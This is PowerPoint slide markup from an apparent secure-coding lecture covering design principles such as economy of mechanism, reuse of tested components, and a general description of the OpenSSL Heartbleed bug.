            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> software projects </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>meet </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>commitments?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Why?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997710" y="3790527"/>
            <a:ext cx="596110" cy="689430"/>
            <a:chOff x="11000575" y="3790621"/>
            <a:chExt cx="596265" cy="689610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11006925" y="3937258"/>
              <a:ext cx="532765" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532765" h="536575">
                  <a:moveTo>
                    <a:pt x="277518" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232037" y="2670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187673" y="13021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145466" y="30809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106458" y="55790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71689" y="87722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42201" y="126360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19892" y="169563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5899" y="214659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967" y="306353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11578" y="350866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28607" y="393097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52830" y="432005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84022" y="466546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121957" y="495676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164536" y="517509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209116" y="530930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254658" y="536184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300125" y="533514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344479" y="523163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386682" y="505375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425695" y="480393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460482" y="448462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490003" y="409824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512308" y="366654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526290" y="321576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532177" y="275637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530195" y="229882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520574" y="185360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503540" y="143114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479323" y="104193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448149" y="69642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410247" y="40508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367664" y="18675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323074" y="5253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27751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1006925" y="3937258"/>
              <a:ext cx="532765" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532765" h="536575">
                  <a:moveTo>
                    <a:pt x="42201" y="126360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71689" y="87722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106458" y="55790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145466" y="30809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187673" y="13021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232037" y="2670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277518" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323074" y="5253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367664" y="18675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410247" y="40508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448149" y="69642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479323" y="104193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503540" y="143114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520574" y="185360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530195" y="229882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532177" y="275637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526290" y="321576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512308" y="366654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490003" y="409824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460482" y="448462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425695" y="480393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386682" y="505375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344479" y="523163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300125" y="533514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254658" y="536184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209116" y="530930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164536" y="517509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121957" y="495676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84022" y="466546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52830" y="432005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28607" y="393097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11578" y="350866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967" y="306353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5899" y="214659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19892" y="169563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42201" y="126360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3241" y="4061821"/>
              <a:ext cx="112323" cy="1123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28311" y="4154279"/>
              <a:ext cx="313392" cy="2003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51843" y="3835227"/>
              <a:ext cx="224996" cy="17197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170544" y="3790621"/>
              <a:ext cx="426084" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="426084" h="117475">
                  <a:moveTo>
                    <a:pt x="214761" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="11577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235736" y="116977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425939" y="95917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147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5836" y="3810828"/>
              <a:ext cx="333155" cy="202378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639013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0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10" dirty="0"/>
              <a:t>Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>– Tips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10145292" cy="2984992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Parts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project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evaluated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their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security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impact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140"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4795351" algn="l"/>
              </a:tabLst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High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impact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components	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(cryptography,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communications,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key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management)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igh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oje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ri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sk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igh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mplexi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(sea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ines,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ases)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Highl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c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mmon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el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men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(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omm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lan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 lib</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-4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ary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mp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nts)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Look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for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existing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code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thoroughly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tested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known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1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Think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terms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 </a:t>
            </a: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Total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Cost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Ownership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6664" y="4201466"/>
            <a:ext cx="5516966" cy="17963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05063" y="6276411"/>
            <a:ext cx="3091645" cy="166028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12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.rohitn.com/images/java/dilbert_codereuse.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="10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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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Establish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Boundaries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6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Don't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Reinvent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Wheel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7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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-1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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Mechanism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55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199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Reluctance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55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Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Design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7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Minimize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Attack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Surface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55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Weakest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Link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44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082285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5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0" dirty="0"/>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0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8670571" cy="3877569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Principle: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mechanisms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 as simple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possible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R="321848" algn="r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Corollary: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All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code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designs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kept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simple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possible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372633" indent="-185364" algn="r" defTabSz="914126"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KISS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adage,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"Keep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It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Simple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Stupid,"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applies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R="3594925" algn="r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Complica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R="3512400" algn="r" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>High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complexity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leads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more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defects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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Complicated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code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is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more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difficult</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="19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test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patch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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Adding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means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more code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Simpl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nstructs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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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3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more likely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defect-free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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Require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less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development</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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test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time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't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implement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unn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ary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nstructs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45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082285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5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0" dirty="0"/>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0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10274164" cy="4374645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Complex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complicated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mplexi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int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rna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 quali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pr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lem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ol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Maybe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less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complex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solution,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maybe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Complicated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 an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external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quality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complicated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implementation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algorithm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has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nothing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do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complexity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 the problem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998555" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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Quantum mechanics is complex, but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book about it has complicated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explanations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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="48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complex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problem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solution,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think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about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ways</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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 reduce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the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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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complexity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118075" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="83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 complicated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solution,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fix it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or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start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over;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what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doing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obvious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742" y="367320"/>
            <a:ext cx="10512862" cy="818302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10515600" h="818515">
                <a:moveTo>
                  <a:pt x="0" y="818388"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10515600" y="818388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10515600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="818388"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25908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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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700" y="380397"/>
            <a:ext cx="5357369" cy="749105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="55230" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" marR="5078">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15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0" dirty="0"/>
              <a:t>Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Mechanism</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0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191" y="1123788"/>
            <a:ext cx="2367679" cy="50461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939149" y="1141310"/>
            <a:ext cx="7678959" cy="3866143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38089" marR="30471" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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versions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1.0.1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 through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1.0.1f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had a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 severe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memory</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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handling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="4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bug</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-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in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their 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implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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of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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="3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TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="15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Heartbeat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Extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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that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could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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be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used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reveal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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up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to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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64 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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kilobytes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0462C1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId5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of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the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application's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memory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with every </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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heartbeat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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" spc="-7" baseline="25462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[19]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" spc="-7" baseline="25462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[20]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" baseline="25462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By reading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the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memory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of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the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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server,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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attackers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could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access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sensitive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data,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 including</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-39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server's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private</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" spc="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799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key</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" u="sng" spc="-37" baseline="25462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[21]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="2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could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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25" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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799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decode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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earlier</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="5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/>
              </a:rPr>
              <a:t>eavesdropped </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-5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communications</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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the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encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-1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protocol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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="10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does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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="10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ensure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="5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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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Perfect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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Forward </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0462C1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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Secrecy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-2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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="10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Knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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of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 the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-1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private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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-2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key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could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="2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also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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="20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an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-20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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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to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mount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  <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>a 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3"/>
              </a:rPr>
              <a:t>man-in-the-middle</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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3"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0462C1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId13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against</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>any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future</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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communications.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The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="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vulnerability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might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also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reveal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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unencrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="2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parts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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users'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 sensitive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 requests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and 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responses,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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including</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="6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4"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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4"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0462C1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId14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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799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passwords,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which</a:t>
            </a:r>
